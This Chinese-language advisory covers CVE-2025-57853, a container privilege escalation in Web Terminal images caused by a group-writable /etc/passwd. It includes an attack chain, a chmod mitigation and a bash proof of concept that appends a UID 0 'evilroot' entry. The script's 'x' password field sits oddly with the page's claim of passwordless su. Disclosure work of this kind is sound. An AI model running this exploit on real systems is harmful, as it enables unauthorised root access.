CVE-2025-57853 CVSS 6.4 中危

CVE-2025-57853 Web Terminal容器权限提升漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-57853

漏洞类型

权限提升

CVSS评分

6.4 中危

攻击向量

本地 (AV:L)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Web Terminal (特定镜像)

漏洞概述

该漏洞是Web Terminal镜像中发现的容器权限提升缺陷。由于构建时/etc/passwd文件被设置为组可写权限，具备root组成员身份的攻击者可修改该文件，添加UID 0用户从而获取容器root权限。

技术细节

该漏洞源于容器镜像构建过程中的配置错误。构建脚本在创建/etc/passwd文件时，未限制文件权限，导致其具有“组可写”属性（如权限664）。在Linux系统中，若用户属于文件所属组，即拥有写权限。Web Terminal镜像中，普通用户常被加入root组。因此，攻击者获得shell后，可利用此权限写入/etc/passwd，追加一个UID为0的新用户（如`attacker::0:0::/root:/bin/bash`）。由于Linux内核以UID 0识别root身份，攻击者无需密码即可通过`su`或直接登录获取root权限，完全控制容器环境。

攻击链分析

STEP 1

获取初始访问

攻击者获取目标Web Terminal容器的命令执行权限，以非root用户身份登录。

STEP 2

权限枚举

攻击者检查当前用户所在的用户组，确认是否属于root组，并检查/etc/passwd文件权限是否为组可写。

STEP 3

修改关键文件

利用组写权限，攻击者向/etc/passwd文件追加一个新的用户条目，设置该用户的UID为0。

STEP 4

权限提升

攻击者切换至新添加的用户（UID 0），从而获得容器内的完整root权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# PoC for CVE-2025-57853
# Exploiting group-writable /etc/passwd to gain root privileges

echo "[+] Checking /etc/passwd permissions..."
LS_OUTPUT=$(ls -ld /etc/passwd)
if [[ $LS_OUTPUT == *"-rw-rw-r--"* ]]; then
    echo "[+] /etc/passwd is group writable!"
    
    echo "[+] Checking current user groups..."
    if groups | grep -q "root"; then
        echo "[+] Current user is part of the 'root' group."
        
        # Create a backup of the original file (optional)
        cp /etc/passwd /tmp/passwd.bak
        
        # Add a new user with UID 0 (root)
        echo "[+] Adding 'evilroot' user with UID 0..."
        echo "evilroot:x:0:0::/root:/bin/bash" >> /etc/passwd
        
        echo "[+] Exploitation complete. Try 'su evilroot' or switch user."
    else
        echo "[-] Current user is not in the 'root' group. Exploit failed."
    fi
else
    echo "[-] /etc/passwd is not group writable. System not vulnerable."
fi

影响范围

Web Terminal (特定受影响镜像)

防御指南

临时缓解措施

在容器启动入口脚本中添加命令 'chmod 644 /etc/passwd' 以强制移除文件的组写权限，或者限制普通用户对容器的访问权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表